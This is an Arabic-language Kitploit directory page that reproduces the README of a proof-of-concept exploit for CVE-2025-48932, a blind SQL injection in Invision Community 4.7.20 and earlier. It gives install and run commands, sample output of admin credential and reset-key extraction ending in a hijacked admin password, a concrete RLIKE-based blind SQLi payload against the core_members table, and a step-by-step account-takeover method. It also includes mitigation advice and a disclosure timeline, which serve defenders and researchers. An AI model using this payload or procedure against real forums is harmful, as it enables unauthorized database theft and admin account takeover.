Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-48932---exploit — استغلال إثبات المفهوم لـ CVE-2025-48932، وهو حقن SQL في Invision Community <= 4.7.20. يستخرج بيانات اعتماد المسؤول عبر SQLi الأعمى ومفتاح إعادة تعيين كلمة المرور للاستيلاء على الحساب. | Kitploit
أدوات/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

استغلال إثبات المفهوم لـ CVE-2025-48932، وهو حقن SQL في Invision Community <= 4.7.20. يستخرج بيانات اعتماد المسؤول عبر SQLi الأعمى ومفتاح إعادة تعيين كلمة المرور للاستيلاء على الحساب.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
2منذ 9 أشهرلم تتم المراجعة بعد

استغلال حقن SQL في Invision Community (CVE-2025-48932)

Python Version License CVE

أداة إثبات المفهوم توضح ثغرة حقن SQL في Invision Community الإصدارات <= 4.7.20.

⚠️ إخلاء مسؤولية

هذه الأداة مقدمة لأغراض التعليم واختبار الأمان المصرح به فقط.

  • الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني
  • استخدم هذه الأداة فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها
  • المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة
  • هذه الأداة مخصصة لباحثي الأمان، ومختبرى الاختراق، ولأغراض التعليم فقط

📋 جدول المحتويات

  • وصف الثغرة
  • المتطلبات
  • التثبيت
  • الاستخدام
  • كيفية العمل
  • التخفيف
  • الإسناد
  • المراجع

🔍 وصف الثغرة

CVE ID: CVE-2025-48932
الخطورة: عالية
درجة CVSS: سيتم تحديدها لاحقًا
الإصدارات المتأثرة: إصدارات Invision Community 4.x قبل 4.7.21

توجد الثغرة في السكريبت /applications/calendar/modules/front/calendar/view.php. المدخلات التي يمررها المستخدم عبر معامل الطلب location في طريقة IPS\calendar\modules\front\calendar\view::search() لا يتم تنقيتها بشكل صحيح قبل استخدامها في استعلامات SQL.

وهذا يسمح للمهاجمين عن بعد غير الموثقين بما يلي:

  • استخراج بيانات حساسة من قاعدة البيانات
  • قراءة بيانات اعتماد المسؤول
  • احتمالية الاستيلاء على حساب المسؤول

المتطلبات المسبقة للاستغلال:

  • يجب أن يكون تطبيق التقويم (Calendar) مثبتًا
  • يجب أن تكون ميزة الموقع الجغرافي (مثل خرائط Google) مهيأة

ملاحظة: بينما يمكن لثغرات حقن SQL في إصدارات Invision Community 4.x < 4.7.18 أن تؤدي إلى الاستيلاء على حساب المسؤول وتنفيذ الأوامر البرمجية عن بعد (RCE) عن طريق إعادة تعيين كلمة مرور المسؤول، فقد أدخل الإصدار 4.7.18 مفتاح تشفير أمان جديد في آلية إعادة تعيين كلمة المرور، مما يجعل هذا المتجه الهجومي أكثر صعوبة.

📦 المتطلبات

  • Python 3.7 أو أعلى
  • pip (مدير حزم Python)
  • اتصال بالإنترنت
  • النظام المستهدف يعمل على Invision Community <= 4.7.20 مع:
    • تطبيق التقويم (Calendar) مثبتًا
    • ميزة الموقع الجغرافي (GeoLocation) مهيأة

🚀 التثبيت

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. تثبيت التبعيات:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 الاستخدام

الاستخدام الأساسي

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

وضع التفصيل (للتشخيص)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

وسائط سطر الأوامر

مثال على المخرجات

root@kitploit:~
==================================================
استغلال حقن SQL في Invision Community <= 4.7.20
CVE-2025-48932
==================================================
الهدف: http://example.com/forum/
==================================================

[*] جلب رمز CSRF...
[+] تم العثور على رمز CSRF: abc123def456...
[*] الخطوة 1: استخراج عنوان البريد الإلكتروني للمسؤول...
[*] استخراج البيانات: [email protected]
[+] البريد الإلكتروني للمسؤول: [email protected]

[!] الخطوة 2: إجراء يدوي مطلوب!

يرجى اتباع هذه الخطوات:
1. انتقل إلى: http://example.com/forum/index.php?/lostpassword/
2. طلب إعادة تعيين كلمة المرور باستخدام البريد الإلكتروني: [email protected]
3. اضغط ENTER عند الانتهاء...

[*] الخطوة 3: استخراج مفتاح التحقق من إعادة تعيين كلمة المرور...
[*] استخراج البيانات: xyz789abc123...
[+] مفتاح إعادة التعيين: xyz789abc123...
[*] الخطوة 4: إعادة تعيين كلمة مرور المسؤول...

==================================================
[+] تم الاستغلال بنجاح!
==================================================

بيانات اعتماد المسؤول:
  البريد الإلكتروني:    [email protected]
  كلمة المرور: Pwned1721234567

يمكنك الآن تسجيل الدخول في: http://example.com/forum/index.php?/login/

🔬 كيفية العمل

يعمل الاستغلال في أربع خطوات رئيسية:

1. استخراج رمز CSRF

يقوم السكريبت أولاً بجلب رمز CSRF من الموقع المستهدف، وهو مطلوب للطلبات اللاحقة.

2. حقن SQL أعمى قائم على القيم المنطقية (Boolean-Based Blind SQL Injection)

باستخدام خوارزمية البحث الثنائي، يقوم الاستغلال باستخراج البيانات حرفًا حرفًا من قاعدة البيانات:

  • يختبر كل حرف باستخدام استعلامات SQL شرطية
  • يستخدم الدالة RLIKE مع أنماط التعبير المنتظم (regex) للكشف عن الشروط الصحيحة/الخاطئة
  • تشير رسائل الخطأ إلى الشروط الناجحة

3. استخراج البريد الإلكتروني للمسؤول

يقوم بالاستعلام عن جدول core_members لاستخراج عنوان البريد الإلكتروني للمسؤول.

4. استغلال إعادة تعيين كلمة المرور

  • يقوم المهاجم يدويًا ببدء إعادة تعيين كلمة المرور لحساب المسؤول
  • يقوم الاستغلال باستخراج مفتاح التحقق من إعادة تعيين كلمة المرور من قاعدة البيانات
  • يستخدم مفتاح التحقق لإعادة تعيين كلمة مرور المسؤول دون الوصول إلى البريد الإلكتروني

التفاصيل التقنية

نقطة الحقن:

root@kitploit:~
location parameter → calendar/view.php → search() method

مثال على الحمولة:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

تقنية الاستغلال: حقن SQL أعمى قائم على القيم المنطقية باستخدام البحث الثنائي لاستخراج البيانات بكفاءة.

🛡️ التخفيف

للمستخدمين

إجراءات فورية:

  1. الترقية إلى الإصدار 4.7.21 أو أحدث - هذا الإصدار يصحح الثغرة
  2. تعطيل تطبيق التقويم إذا لم يكن قيد الاستخدام
  3. مراقبة سجلات الوصول بحثًا عن نشاط مشبوه
  4. مراجعة حسابات المسؤولين للتحقق من الوصول غير المصرح به

للمطورين

ممارسات البرمجة الآمنة:

  1. استخدام الاستعلامات المعلمة/الجمل المحضرة - لا تقم أبدًا بدمج مدخلات المستخدم في استعلامات SQL
  2. التحقق من صحة المدخلات - تحقق من جميع مدخلات المستخدم ونقها
  3. مبدأ الامتياز الأقل - يجب أن يتمتع مستخدمو قاعدة البيانات بأقل الصلاحيات المطلوبة
  4. جدار حماية تطبيقات الويب (WAF) - نشر قواعد WAF للكشف عن محاولات حقن SQL
  5. تدقيق أمني منتظم - إجراء مراجعات دورية للكود واختبارات اختراق

مثال على كود آمن:

root@kitploit:~
// كود ضعيف
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// كود آمن
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 الجدول الزمني للإفصاح

التاريخالحدث
16 مايو 2025تم إخطار البائع
27 مايو 2025تم إصدار الإصدار 4.7.21
28 مايو 2025تم طلب معرف CVE

👏 الإسناد

المطور:

  • nanda

ملاحظة: هذا تنفيذ مستقل يعتمد على معلومات الثغرة المفصح عنها علنيًا (CVE-2025-48932)

📚 المراجع

  • تفاصيل CVE-2025-48932
  • الموقع الرسمي لـ Invision Community
  • EDB-ID: 52383

📝 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.

🤝 المساهمة

المساهمات مرحب بها! لا تتردد في تقديم طلب سحب (Pull Request). بالنسبة للتغييرات الكبيرة، يرجى فتح مشكلة (issue) أولاً لمناقشة ما تريد تغييره.

⚖️ إشعار قانوني

هذه الأداة موزعة بموجب رخصة MIT. باستخدام هذا البرنامج، فإنك توافق على:

  1. استخدامه فقط لأغراض الاختبار القانونية والمصرح بها
  2. تحمل المسؤولية الكاملة عن أفعالك
  3. عدم تحميل المؤلف المسؤولية عن أي إساءة استخدام أو ضرر
  4. الامتثال لجميع القوانين واللوائح المعمول بها

تذكر: الوصول غير المصرح به إلى أنظمة الحاسوب هو جريمة في معظم البلدان ويمكن أن يؤدي إلى عواقب قانونية شديدة.


إذا اكتشفت ثغرة أمنية، يرجى الإفصاح عنها بشكل مسؤول للبائع قبل نشرها علنًا.

تنزيل الأداة
الوسيطالوصفمطلوب
-u, --urlعنوان URL الأساسي لـ Invision Community المستهدفنعم
-v, --verboseتمكين الإخراج المفصل للتشخيصلا
-h, --helpعرض رسالة المساعدة والخروجلا
28 مايو 2025تم تعيين CVE-2025-48932
23 يوليو 2025الإفصاح العلني